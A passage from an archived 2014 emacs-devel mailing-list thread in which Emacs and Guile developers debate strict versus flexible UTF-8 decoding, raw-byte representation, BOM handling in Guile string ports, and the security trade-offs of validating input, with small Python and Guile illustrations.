by all internal operations and kept unconfusable with other characters
equals "carelessness in security".

In fact, not being able to even _look_ at such material or have a
representation for it seems like a much more severe shortcoming.

Now you claim that you want such support but only if very explicitly
requested, making it a second-class citizen.

This set of priorities has left XEmacs without a round-trippable UTF-8
representation even to date.  I've also already given an example of
GUILE code that is unable to losslessly pass a string through a string
port (the standard mechanism for _accumulating_ a string).  Again, this
is an outcome of the "let's cater primarily for good encodings"
philosophy that is at the bottom of _many_ security problems.  And of
course a perfect vector for denial of service attacks.

An engine that is not able without extra measures to reproduce its input
is not going to win friends.  And it's not like this is an actual
security feature.

What's next?  Text processors that cut off lines after column 80 as a
security feature?  Because people might not see those characters, it is
safer to remove them?

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-12 12:34                                                                           ` David Kastrup
@ 2014-10-12 14:49                                                                             ` Stephen J. Turnbull
  2014-10-12 16:50                                                                               ` David Kastrup
                                                                                                 ` (2 more replies)
  0 siblings, 3 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-12 14:49 UTC (permalink / raw)
  To: David Kastrup; +Cc: emacs-devel

David Kastrup writes:

 > I don't buy the claims that the ability to faithfully represent
 > arbitrary input in a consistent and reproducible manner fully supported
 > by all internal operations and kept unconfusable with other characters
 > equals "carelessness in security".

Good for you!  I wouldn't either -- if any such claim had ever been made.

 > Now you claim that you want such support but only if very explicitly
 > requested,

Yes, that is my own preference.  I could easily be wrong for the
general user, as I've been rolling handlers for broken encoding usage
for 25 years.  However, I've also seen the damage that can be done
when a component of a system makes a virtue of transmitting everything
verbatim, and believe it's best to start secure.

 > making it a second-class citizen.

Non-default is *not* second-class.  And if warranted, defaults can be
changed.  I just prefer starting with safe defaults.  Although you
personally may suffer due to the applications you work on, I suspect
you will be surprised at the lack of outcry if you change the default
judiciously, case by case.

 > I've also already given an example of GUILE code that is unable to
 > losslessly pass a string through a string port (the standard
 > mechanism for _accumulating_ a string).

Presumably improving that situation is precisely why Mark is here.

 > Again, this is an outcome of the "let's cater primarily for good
 > encodings" philosophy that is at the bottom of _many_ security
 > problems.

Sigh.  It is *Emacs* that assumes the world is full of valid data, and
happily shovels any hazmat it receives on to the next user or program
without validation.  And you're right, it *is* a security problem.
Not just denial of service, either.  You say that behavior is what
Emacs users want, and maybe it is.  Because most of the time the data
is "nearly" valid and the defects are "insignificant", and hardly a
security problem.  It's the "worse is better" philosophy.[1]

But the rest of the software development world is going in the
opposite direction.  "In God we trust.  All others, present photo ID."
Maybe they have figured something out?  Heck, even Emacs is moving in
the direction of defending *itself* from invalid data in other ways
(thank you, Ted Z!)

Footnotes: 
[1]  Read Gabriel's essay of that title before taking that as an insult.





* Re: Emacs Lisp's future
  2014-10-12 14:49                                                                             ` Stephen J. Turnbull
@ 2014-10-12 16:50                                                                               ` David Kastrup
  2014-10-13  2:40                                                                                 ` Mark H Weaver
  2014-10-13  3:08                                                                               ` Richard Stallman
  2014-10-13  3:41                                                                               ` Richard Stallman
  2 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-12 16:50 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: emacs-devel

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Sigh.  It is *Emacs* that assumes the world is full of valid data,

Nonsense.  It would not need to _carefully_ _deal_ with data not fitting
an encoding if it assumed that.

It _carefully_ decodes non-representable data into a code page reserved
for non-representable data.  It will deal _properly_ with that data
while it is under control of its strings (not upper/lowercasing it or
mixing it up with other stuff) and will carefully repackage it when
encoding it.

As a consequence, it is easy to apply _any_ strategy to your data.  If
you want to clean out characters that are invalid for your application,
any respective positive or negative character and coding ranges in a
regexp pattern will carefully deal with it.
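
As a rough illustration outside Emacs, Python's "surrogateescape" error
handler follows a similar idea: undecodable bytes are mapped into a
reserved range (the lone surrogates U+DC80..U+DCFF) and restored when
encoding.  The sketch below only assumes that analogy; the helper name
strip_undecodable is made up for the example and is not an Emacs or
Guile API.

```python
import re

# Bytes that are not valid UTF-8: a stray 0xE9 (Latin-1 "e acute").
raw = b"caf\xe9 au lait"

# Decode flexibly: the invalid byte becomes the reserved code point U+DCE9.
text = raw.decode("utf-8", errors="surrogateescape")

# Ordinary string operations leave the escaped byte alone.
shouted = text.upper()

# Encoding with the same handler reproduces the original bytes exactly.
assert text.encode("utf-8", errors="surrogateescape") == raw

# Any policy can be layered on top, e.g. dropping the escaped bytes
# with a character range in a regexp.
ESCAPED_BYTE = re.compile("[\udc80-\udcff]")


def strip_undecodable(s: str) -> str:
    """Hypothetical cleanup policy: remove every escaped raw byte."""
    return ESCAPED_BYTE.sub("", s)
```

The point of the sketch is the layering: decoding never loses
information, and rejecting or cleaning the data is a separate step
that the application chooses.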

> and happily shovels any hazmat it receives on to the next user or
> program without validation.

Emacs has no way to know what input is valid for the next user or
program.  An application programmed in Elisp may know, and it has _all_
the tools to deal _gracefully_ with it since Emacs' string processing
will _not_ get confused by data it decoded itself and will preserve all
information.

> And you're right, it *is* a security problem.  Not just denial of
> service, either.  You say that behavior is what Emacs users want, and
> maybe it is.  Because most of the time the data is "nearly" valid and
> the defects are "insignificant", and hardly a security problem.  It's
> the "worse is better" philosophy.[1]

No, it is the "clueless is useless" philosophy.  Don't second-guess
other systems.  Do your job properly, regardless of what is thrown at
you.  Don't be the weakest link in a chain.

Emacs cannot be a verification engine if it has no clue what it should
be verifying.  If you know what you want, you can get it.  Regardless of
what you want.

libunistring (which is what GUILE currently uses for UTF-8 processing)
has a _closed_ set of recovery strategies.  As it stands, it is useless
for implementing Emacs-like behavior because "encode invalid bytes into
something libunistring can deal with transparently" is not part of its
recovery strategies.  Once you _have_ a useful encoding into the space
of properly working strings, _any_ recovery strategy is easy to
implement on top of that.

For a platform, being forced to a closed set of behaviors is an
extremely limiting choice.

> But the rest of the software development world is going in the
> opposite direction.  "In God we trust.  All others, present photo ID."
> Maybe they have figured something out?  Heck, even Emacs is moving in
> the direction of defending *itself* from invalid data in other ways
> (thank you, Ted Z!)

You don't need to defend yourself from something you are equipped to
deal with.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-12 16:50                                                                               ` David Kastrup
@ 2014-10-13  2:40                                                                                 ` Mark H Weaver
  2014-10-13  4:49                                                                                   ` Mark H Weaver
  0 siblings, 1 reply; 261+ messages in thread
From: Mark H Weaver @ 2014-10-13  2:40 UTC (permalink / raw)
  To: David Kastrup; +Cc: Stephen J. Turnbull, emacs-devel

David Kastrup <dak@gnu.org> writes:

> libunistring (which is what GUILE currently uses for UTF-8 processing)
> has a _closed_ set of recovery strategies.  As it stands, it is useless
> for implementing Emacs-like behavior because "encode invalid bytes into
> something libunistring can deal with transparently" is not part of its
> recovery strategies.  Once you _have_ a useful encoding into the space
> of properly working strings, _any_ recovery strategy is easy to
> implement on top of that.
>
> For a platform, being forced to a closed set of behaviors is an
> extremely limiting choice.

How many times do I have to repeat it?  I agree we should provide an
*option* for doing what you want.  No matter how many times I say it,
you keep pretending that I didn't say it, and spreading FUD about Guile
"forcing" policies on applications.

What you wrote above simply shows your ignorance of Guile.  Yes, we use
libunistring for some things, but we do _not_ use it for character
encoding conversions.  For that we use iconv, which gives us all the
tools we need to provide Emacs-like behavior.

Stop setting up strawmen and hacking away at them.  I've got better
things to do with my time than countering your endless stream of FUD,
which by now has been featured on LWN.

     Mark




* Re: Emacs Lisp's future
  2014-10-09  9:22                                                               ` David Kastrup
@ 2014-10-13  3:04                                                                 ` Mark H Weaver
  2014-10-13  7:41                                                                   ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Mark H Weaver @ 2014-10-13  3:04 UTC (permalink / raw)
  To: David Kastrup
  Cc: rms, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii,
	stephen

David Kastrup <dak@gnu.org> writes:

> Eli Zaretskii <eliz@gnu.org> writes:
>
>>> From: David Kastrup <dak@gnu.org>
>>> Cc: rms@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
>>> emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
>>> stephen@xemacs.org
>>> Date: Thu, 09 Oct 2014 09:52:31 +0200
>>> 
>>> I still don't want the autosave of mail to complain about bad
>>> characters.
>>
>> We write the auto-save files in the internal format, so it never
>> complains.
>
> If you are not allowed or able to do that...  At the current point of
> time, the only round-trippable encoding for bytes that GUILE offers is
> latin-1, and the only round-trippable encoding for characters is utf-8.

"Not allowed"?  Another strawman.  I guess it's a waste of time for me
to say, yet again, that we'll support the "raw bytes" encodings, because
you'll just keep on pretending that we won't allow it.

> The conceptual lack of separation between internal and external utf-8
> encoding leads to strangenesses like
>
> scheme@(guile-user)> (with-input-from-string "\ufeff!" read-char)
> $8 = #\!
>
> Yes, this is a string->string operation losing a byte order mark in
> spite of no indication that I would like to get encodings involved in
> any manner.

Byte Order Marks are an ugly corner of Unicode, and I spent a lot of
effort to try to do the right thing here.  What we do in Guile is
described here:

  https://www.gnu.org/software/guile/manual/html_node/BOM-Handling.html

I agree that we should inhibit BOM handling for string ports.
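
For comparison only, here is how the same distinction looks in Python,
which keeps BOM handling in the codec layer rather than in in-memory
string streams.  This is not Guile code and says nothing about how
Guile's ports are implemented; it is just a sketch of the behavior
being asked for.

```python
import io

# A string-to-string operation: no codec is involved, so U+FEFF survives.
port = io.StringIO("\ufeff!")
first = port.read(1)

# Decoding bytes is where BOM policy applies, and it is chosen explicitly.
data = "\ufeff!".encode("utf-8")      # b"\xef\xbb\xbf!"
kept = data.decode("utf-8")           # BOM kept as U+FEFF
dropped = data.decode("utf-8-sig")    # BOM consumed by the codec
```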

> And when I can say "let's see where this kind of thinking will lead" and
> find a hole to poke within a minute,

BTW, your claim that you found this hole "within a minute" is a
bald-faced lie and you know it.  In <http://bugs.gnu.org/18520>, I
stated my belief that our internal use of UTF-8 in string ports was not
visible to the application as long as you didn't manually change the
encoding for the string port or use seek/ftell.  That was on Sept 24th.

You spent a *lot* of time arguing with us in that bug report, and this
is exactly the observation you could have used to bolster your argument,
but you never found it until now.

      Mark




* Re: Emacs Lisp's future
  2014-10-12  5:47                                                                     ` Eli Zaretskii
@ 2014-10-13  3:07                                                                       ` Richard Stallman
  2014-10-13  3:38                                                                       ` Richard Stallman
  1 sibling, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-13  3:07 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    > Assume that any operation which decodes text _for a user to see_
    > will specify flexible decoding.

    That means almost all of them, more-or-less.  So it goes against what
    AFAIU Mark had in mind with "strict UTF-8".

I don't think so.  I think he is talking about operations OTHER THAN
those that decode text to put it in a buffer and show it to a user.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





* Re: Emacs Lisp's future
  2014-10-12 14:49                                                                             ` Stephen J. Turnbull
  2014-10-12 16:50                                                                               ` David Kastrup
@ 2014-10-13  3:08                                                                               ` Richard Stallman
  2014-10-13  4:50                                                                                 ` Stephen J. Turnbull
  2014-10-13  3:41                                                                               ` Richard Stallman
  2 siblings, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-13  3:08 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: dak, emacs-devel


    Sigh.  It is *Emacs* that assumes the world is full of valid data, and
    happily shovels any hazmat it receives on to the next user or program
    without validation.  And you're right, it *is* a security problem.

It is not much of a security problem in Emacs.

The defaults for the standard Guile primitives could be strict,
and the defaults for some Emacs Lisp functions could be flexible.






* Re: Emacs Lisp's future
  2014-10-12  5:22                                                                     ` David Kastrup
@ 2014-10-13  3:09                                                                       ` Richard Stallman
  2014-10-13  3:44                                                                       ` Richard Stallman
  1 sibling, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-13  3:09 UTC (permalink / raw)
  To: David Kastrup; +Cc: mhw, dmantipov, emacs-devel, handa, monnier, eliz, stephen


    >     What will Emacs do, under this proposal, if the user is asked whether
    >     to keep the original raw bytes and answers NO?
    >
    > Abort the operation, I suppose.

    It's going to be a wagonload of fun if I do

    emacsclient `git grep -l some-pattern`

    in order to edit 30 files and Emacs decides to abort and/or ask each
    time a comment contains a stray latin-1 character.

I presume not many of these files will have raw bytes in them
if they are in a system that is being properly maintained.

But it occurs to me that there could be another option to offer users
on such occasions: to convert the raw bytes to Unicode characters
assuming that they were meant to be Latin-N (the user can pick the N).
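
A minimal sketch of that option, written in Python rather than Emacs
Lisp and assuming its "surrogateescape" handler as the way to keep raw
bytes around until the user has chosen.  The function name
raw_bytes_to_latin and its parameter are invented for the example.

```python
def raw_bytes_to_latin(raw: bytes, latin: str = "latin-1") -> str:
    """Decode as UTF-8, reading each invalid byte as a Latin-N character.

    `latin` is any Python codec name, e.g. "latin-1" or "iso8859-15".
    """
    # surrogateescape maps each undecodable byte 0xNN to U+DC00 + 0xNN.
    text = raw.decode("utf-8", errors="surrogateescape")
    out = []
    for ch in text:
        code = ord(ch)
        if 0xDC80 <= code <= 0xDCFF:
            # Recover the original byte and reinterpret it as Latin-N.
            out.append(bytes([code - 0xDC00]).decode(latin))
        else:
            out.append(ch)
    return "".join(out)
```

Valid UTF-8 sequences pass through unchanged, so a file that is mostly
UTF-8 with a few stray Latin-1 bytes in comments comes out as clean
Unicode text.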






* Re: Emacs Lisp's future
  2014-10-12  5:54                                                               ` Eli Zaretskii
@ 2014-10-13  3:10                                                                 ` Richard Stallman
  2014-10-13  5:35                                                                   ` Stephen J. Turnbull
  2014-10-13  5:43                                                                   ` Eli Zaretskii
  2014-10-13  3:46                                                                 ` Richard Stallman
  1 sibling, 2 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-13  3:10 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen


    >     And, of course, when you invoke a program locally, there's usually no
    >     protocol at all involved.
    > 
    > Likewise, we need to look at some real cases.

    Not sure what you mean by that.  M-! and M-| is what I had in mind.

This may be a big miscommunication.  I think the people who want
strict encoding are talking about network communication using
open-network-stream.

But it would be good if they presented some examples to make it
clear what cases they are talking about.










* Re: Emacs Lisp's future
  2014-10-13  2:40                                                                                 ` Mark H Weaver
@ 2014-10-13  4:49                                                                                   ` Mark H Weaver
  0 siblings, 0 replies; 261+ messages in thread
From: Mark H Weaver @ 2014-10-13  4:49 UTC (permalink / raw)
  To: David Kastrup; +Cc: Stephen J. Turnbull, emacs-devel

I wrote:
> What you wrote above simply shows your ignorance of Guile.  Yes, we use
> libunistring for some things, but we do _not_ use it for character
> encoding conversions.  For that we use iconv, which gives us all the
> tools we need to provide Emacs-like behavior.

It turns out I was partially mistaken.  We use iconv in some places and
libunistring in some others.  Anyway, it seems that I have lost my
temper with David, which is embarrassing.  I'd best drop out of this
conversation now.

      Mark




* Re: Emacs Lisp's future
  2014-10-13  3:08                                                                               ` Richard Stallman
@ 2014-10-13  4:50                                                                                 ` Stephen J. Turnbull
  0 siblings, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-13  4:50 UTC (permalink / raw)
  To: rms; +Cc: dak, emacs-devel

Richard Stallman writes:

 > The defaults for the standard Guile primitives could be strict,
 > and the defaults for some Emacs Lisp functions could be flexible.

Which is precisely what I proposed from the beginning[1], and as I
understand his posts, it is what Mark has had in mind throughout as
well.

Speaking *only* for myself, I would *prefer* defaults for text coding
set by Emacs to be strict, and I believe that is both in the average
user's interest and not too inconvenient *in today's environment*.[2]
But it should be easy for applications and modes to say to Emacs "do
what you would have done in Emacs 24" and "do what you would have done
in Emacs 24 *except* apply a strict(er) error handling on invalid
encoding".
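
To make the shape of that proposal concrete, here is a small Python
sketch (not Emacs or Guile code): the low-level primitive is strict by
default, and a higher-level wrapper opts in to flexible,
round-trippable decoding.  Both function names are hypothetical.

```python
def decode_text(raw: bytes, errors: str = "strict") -> str:
    """Decode UTF-8; invalid input raises unless the caller opts out."""
    return raw.decode("utf-8", errors=errors)


def decode_for_editing(raw: bytes) -> str:
    """Hypothetical flexible wrapper: keep invalid bytes round-trippable."""
    return decode_text(raw, errors="surrogateescape")


# The strict default refuses invalid input ...
try:
    decode_text(b"ok\xff")
    strict_rejected = False
except UnicodeDecodeError:
    strict_rejected = True

# ... while the flexible wrapper preserves it for later re-encoding.
kept = decode_for_editing(b"ok\xff")
```

Here the choice of policy is a single argument, so an application or
mode that needs the old behavior can ask for it explicitly.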

Experience may show that my preferred default is too strict for Emacs,
even today, but I believe it is the place to start.

FWIW IMHO YMMV


Footnotes: 
[1]  Although my expression of that proposal seems to have been
unintelligible.  Sorry!

[2]  tl;dr

UTF-8 is rapidly becoming the preferred encoding for many natural
languages, although China encourages GB18030 by law and Japan and
Russia both maintain their historical Babel of encodings.  Protocols
are both becoming stricter about validation, and using the sensible
default of UTF-8.  Internet protocols, where security is a very
important aspect, are gradually shifting from insisting on ASCII to
defaulting to UTF-8 (although often in some kind of "ASCII-armored"
encoding such as BASE64 or punycode).

So in general, with a few application-specific exceptions (hello,
AUCTeX), both users and applications should encounter far fewer
instances of broken encoding than in the era when the experiments Eli
and David refer to were conducted.  This is somewhat supported by the
fact that at least one major dynamic language (Python) doesn't even
provide an encoding detection function in its standard library.  The
typical range of use cases is different, granted, but editing
applications (the IDLE IDE and the IPython "notebook" facility) don't
seem to have issues with defaulting to "strict".





* Re: Emacs Lisp's future
  2014-10-13  3:10                                                                 ` Richard Stallman
@ 2014-10-13  5:35                                                                   ` Stephen J. Turnbull
  2014-10-13  6:02                                                                     ` Eli Zaretskii
                                                                                       ` (2 more replies)
  2014-10-13  5:43                                                                   ` Eli Zaretskii
  1 sibling, 3 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-13  5:35 UTC (permalink / raw)
  To: rms
  Cc: dak, handa, mhw, dmantipov, emacs-devel, mikegerwitz, monnier,
	Eli Zaretskii

Richard Stallman writes:

 > I think the people who want strict encoding are talking about
 > network communication using open-network-stream.

Speaking only for myself, no, I mean all octet streams purported to
be encoded text, network or local.  Network streams can only be
considered safe in very carefully maintained environments, so the
risks are greatest there.

But there's no such thing as a truly local stream, since any given
stream may be a file downloaded from the network or provided by an
application of uncertain provenance.  There are three cases of
interest, AFAICS:

(1) The file or application is truly local, provided with the OS or
    created by the user.  In that case on a well-maintained system,
    the encoding should be valid, as you pointed out elsewhere.
    Therefore a strict policy should be transparent.  (See (3) for
    what I believe to be the main class of exceptions.)

(2) The file or application was downloaded from the network.  Emacs
    cannot know the provenance, and so the same care should be taken
    as with a network stream.

(3) The application is trustworthy, but produces invalid encoded text
    in some well-understood situations.  In this case the Lisp program
    should be allowed to opt out of default validation and provide its
    own.  Preferably only in the specific situations rather than
    globally.

An example of (3) is David's case, with AUCTeX handling of TeX error
messages containing non-unibyte text.  AFAIK such applications are
quite rare nowadays.  TeX is a special case because it is one of the
few applications whose behavior is specified extremely precisely but
in an encoding-oblivious way.[1]

As an example of special validation in (3), AIUI in TeX error
messages, only a very few leading and trailing bytes of quoted source
text should be invalid.  Thus the rest should be valid, and the user
probably should be notified of unexpected rawbytes.  (That's up to the
Lisp programmer, of course.  Still I think such flexible validation is
in the user's interest if the programmer is willing to provide it.)
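
A rough sketch of that kind of flexible validation, written in Python
purely for illustration.  Python's "surrogateescape" error handler
stands in for Emacs's raw-byte characters, and the function name and
the `slack' parameter are made up for this example; nothing here is
AUCTeX's or Emacs's actual code.

```python
def check_quoted_context(raw, slack=4):
    """Decode RAW as UTF-8 without losing undecodable bytes.

    Returns (text, unexpected), where UNEXPECTED lists the character
    positions of raw bytes found outside the first and last SLACK
    characters, i.e. outside the region where truncation is expected.
    """
    # Undecodable bytes become lone surrogates U+DC80..U+DCFF.
    text = raw.decode("utf-8", errors="surrogateescape")
    unexpected = [
        i
        for i, ch in enumerate(text)
        if 0xDC80 <= ord(ch) <= 0xDCFF and slack <= i < len(text) - slack
    ]
    return text, unexpected


# Quoted source cut in the middle of a character at both ends.
text, unexpected = check_quoted_context(b"\xa9 na\xc3\xafve caf\xc3")
if unexpected:
    print("unexpected raw bytes at", unexpected)
```

What to do with a non-empty `unexpected' list (warn, highlight, or
abort) is left to the calling program.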

I am unaware of other large classes of exceptional cases in modern
GNU/Linux systems, or the major proprietary OSes.

I understand David and Eli to be of the opinion that in practice there
is insignificant risk to Emacs or its users from any form of invalid
or malicious input, from the network or local.  I disagree.

Footnotes: 
[1]  I'm referring to the TRIP test.  This specification effectively
assumes a unibyte encoding, and so it is likely to be very difficult
to create a TeX implementation that handles Unicode conformant to the
standard *and* passes TRIP.  I'll take a TeX that passes TRIP any day!





* Re: Emacs Lisp's future
  2014-10-13  3:10                                                                 ` Richard Stallman
  2014-10-13  5:35                                                                   ` Stephen J. Turnbull
@ 2014-10-13  5:43                                                                   ` Eli Zaretskii
  2014-10-14  2:09                                                                     ` Richard Stallman
  1 sibling, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-13  5:43 UTC (permalink / raw)
  To: rms; +Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen

> Date: Sun, 12 Oct 2014 23:10:11 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: dak@gnu.org, mikegerwitz@gnu.org, mhw@netris.org,
> 	dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org,
> 	monnier@iro.umontreal.ca, stephen@xemacs.org
> 
>     >     And, of course, when you invoke a program locally, there's usually no
>     >     protocol at all involved.
>     > 
>     > Likewise, we need to look at some real cases.
> 
>     Not sure what you mean by that.  M-! and M-| is what I had in mind.
> 
> This may be a big miscommunication.  I think the people who want
> strict encoding are talking about network communication using
> open-network-stream.

That distinction is quite blurred in latest Emacs versions.  E.g.,
shell-command-to-string might call a process on a remote host and
communicate with it via open-network-stream or some such.  There are
several interactive commands already that use this feature.




* Re: Emacs Lisp's future
  2014-10-13  5:35                                                                   ` Stephen J. Turnbull
@ 2014-10-13  6:02                                                                     ` Eli Zaretskii
  2014-10-13  8:24                                                                       ` Stephen J. Turnbull
  2014-10-13 14:55                                                                     ` Paul Eggert
  2014-10-14  2:11                                                                     ` Richard Stallman
  2 siblings, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-13  6:02 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, rms, handa, mhw, dmantipov, emacs-devel, mikegerwitz,
	monnier

> From: "Stephen J. Turnbull" <stephen@xemacs.org>
> Cc: Eli Zaretskii <eliz@gnu.org>,
>     dak@gnu.org,
>     mikegerwitz@gnu.org,
>     mhw@netris.org,
>     dmantipov@yandex.ru,
>     emacs-devel@gnu.org,
>     handa@gnu.org,
>     monnier@iro.umontreal.ca
> Date: Mon, 13 Oct 2014 14:35:02 +0900
> 
> (1) The file or application is truly local, provided with the OS or
>     created by the user.  In that case on a well-maintained system,
>     the encoding should be valid, as you pointed out elsewhere.
>     Therefore a strict policy should be transparent.  (See (3) for
>     what I believe to be the main class of exceptions.)
> 
> (2) The file or application was downloaded from the network.  Emacs
>     cannot know the provenance, and so the same care should be taken
>     as with a network stream.
> 
> (3) The application is trustworthy, but produces invalid encoded text
>     in some well-understood situations.  In this case the Lisp program
>     should be allowed to opt out of default validation and provide its
>     own.  Preferably only in the specific situations rather than
>     globally.

There's also the case that the application was invoked on a remote
host, and its output is passed via the network (a.k.a. "Tramp").  Not
sure if those 3 cases cover that.

> An example of (3) is David's case, with AUCTeX handling of TeX error
> messages containing non-unibyte text.  AFAIK such applications are
> quite rare nowadays.

"Rare" doesn't mean unimportant to users to the degree we can ignore
them.  If we do want to cater to those "rare" cases, the only way of
doing that is maintain a database of programs and their behaviors.  We
don't have that now, and I'm not sure how practical this could be, and
what kind of maintenance burden it would require to keep the database
up to date.

Moreover, I don't think case (1) is as easy as you seem to think.  The
current Emacs policy is to use the locale-specific encoding, but that
is just a heuristic that could easily be false, as modern distributed
network-based computing doesn't lend itself well to the notion of a
fixed locale with a single encoding.  In many cases, a file or a
program that you think are "local" really aren't.

> I understand David and Eli to be of the opinion that in practice there
> is insignificant risk to Emacs or its users from any form of invalid
> or malicious input, from the network or local.  I disagree.

I never said anything like that.  I simply don't have the expertise to
assess the real amount of risk associated with this particular aspect
of Emacs.  All I can cite is my own experience.

What I did say, and stand by, is that doing what you suggest is
certain to cause user outcry of the kind I remember very well.  I
think it's naive to assume that "this time it will be different";
experience has taught me that this attitude is ill-advised.

Therefore, I think Emacs should only go to the kind of strict defaults
you propose if _users_ demand that, or if real-life Emacs use stories
show up that demonstrate the actual danger from using the current
default.  We shouldn't do that out of our own initiative based on
academic considerations and examples from PHP or whatever.




* Re: Emacs Lisp's future
  2014-10-13  3:04                                                                 ` Mark H Weaver
@ 2014-10-13  7:41                                                                   ` David Kastrup
  0 siblings, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-13  7:41 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: rms, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii,
	stephen

Mark H Weaver <mhw@netris.org> writes:

> David Kastrup <dak@gnu.org> writes:
>
>> The conceptual lack of separation between internal and external utf-8
>> encoding leads to strangenesses like
>>
>> scheme@(guile-user)> (with-input-from-string "\ufeff!" read-char)
>> $8 = #\!
>>
>> Yes, this is a string->string operation losing a byte order mark in
>> spite of no indication that I would like to get encodings involved in
>> any manner.
>
> Byte Order Marks are an ugly corner of Unicode, and I spent a lot of
> effort to try to do the right thing here.  What we do in Guile is
> described here:
>
>   https://www.gnu.org/software/guile/manual/html_node/BOM-Handling.html
>
> I agree that we should inhibit BOM handling for string ports.
>
>> And when I can say "let's see where this kind of thinking will lead" and
>> find a hole to poke within a minute,
>
> BTW, your claim that you found this hole "within a minute" is a
> bald-faced lie and you know it.

> In <http://bugs.gnu.org/18520>, I stated my belief that our internal
> use of UTF-8 in string ports was not visible to the application as
> long as you didn't manually change the encoding for the string port or
> use seek/ftell.  That was on Sept 24th.

Uh, my claim was not that I found this problem a minute after first
thinking about GUILE's string handling.  It was more about how long it
took me after deciding to look for an example for _this_ discussion.
Now my above description may not be accurate since "let's see where this
kind of thinking will lead" is obviously not something that occurred to
me just these days, or even these years.  So it applied to the more
concrete case of reading in the GUILE manual about its BOM handling,
making the connection to string ports, thinking "now that's likely to be
another half-baked bean", and finding that issue by experiment.

To the best of my memory, this _was_ the first time I read about BOM
handling in GUILE.  That does not mean that I can vouch for this page
never having been on-screen before, or even me having skimmed through
it.  But it definitely is the first time I remember having read it now.

> You spent a *lot* of time arguing with us in that bug report, and this
> is exactly the observation you could have used to bolster your
> argument, but you never found it until now.

Because I did not look for it before.  At any rate, in relation to that
bug report I had a different actual example exposed in
<URL:http://debbugs.gnu.org/cgi/bugreport.cgi?bug=18520#41> (for which I
provided a patch in
<URL:http://debbugs.gnu.org/cgi/bugreport.cgi?bug=18536>).  That bug
came from the attempt to create an open-coded fast path to speed up a
few gratuitous
conversions when reading numbers from a string port (encode to UTF-8
because string ports are implemented as byte streams, decode when
reading, reencode when ungetting the non-digit read after the last
digit, redecode when reading it again...).  I think it was more or less
sorted into the "one bug does not demonstrate a problem" category.

That bug jumped out at me not when I was searching for a redecoding
problem but rather when I looked at the code in ports.c (which that
issue was about) after musing "how are they going to unread in a string
port?".  And the open-coded conversion was there to avoid calling the
apparently slow libunistring (yes, libunistring) function
u32_conv_to_encoding
<URL:https://www.gnu.org/software/libunistring/manual/html_node/uniconv_002eh.html>.

Bugs happen.  But code that is not called in the first place can cause
no bug.

At any rate, when looking for a snappy "this might not work well with
reencoding example" on the Emacs Lisp, I first looked at surrogate
words.

Well, (integer->char #xd800) throws an out-of-range error.  So one is
not even allowed to talk about surrogate words at the character/word
level, look for them with regular expressions and so on.

I have some choice words for that as well, but it's not a bug.  It's
pretty much a necessary consequence of the design that does not give
representation to input outside of the proper UTF-8 range.  Since "not
practical" was already cried down as a consideration in this discussion,
I wanted an actual bug rather than just a refusal to work with things
defined as invalid.

So I looked in the GUILE manual to see whether I could find something
about surrogate words and instead chanced upon "BOM" which apparently
_was_ allowed into strings, so I just thought "oh, that could be an
equally bad can of worms".  And admittedly, my first try was using the
string port in the other direction, namely with-output-to-string.  From
the description I'd have expected _that_ to blow up rather than the
other way round.

And the time from "oh, this one could be bad as well" to finding the
problem (I am not even sure it is a bug rather than a particularly
jarring but logical consequence of the way string ports are defined in
GUILE as a byte stream with encoding) was not more than a few minutes at
best.  A fix will likely be equally fast to do, and there is a school
that every sufficiently patched-up software is indistinguishable from
design.
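
The effect can be imitated outside of GUILE.  The following Python
sketch is only an analogy: it assumes that a "string port" implemented
as a byte stream plus a BOM-aware decoder behaves like Python's
"utf-8-sig" codec, and the two helper names are invented for the
example.

```python
import io


def first_char_from_characters(s):
    """Read one character from a purely character-based string port."""
    return io.StringIO(s).read(1)


def first_char_via_bytes(s):
    """Read one character from a string port built on a byte stream.

    The string is encoded to UTF-8 and read back through a decoder
    that consumes a leading byte order mark.
    """
    stream = io.BytesIO(s.encode("utf-8"))
    port = io.TextIOWrapper(stream, encoding="utf-8-sig")
    return port.read(1)


text = "\ufeff!"
print(repr(first_char_from_characters(text)))  # the BOM character itself
print(repr(first_char_via_bytes(text)))        # the BOM has been swallowed
```

The character-level port never involves an encoding, so there is
nothing for it to lose.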

So that's the history of this bald-faced lie of mine.  I am sure that
I offer better opportunities for ad hominem attacks than that.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-13  3:44                                                                       ` Richard Stallman
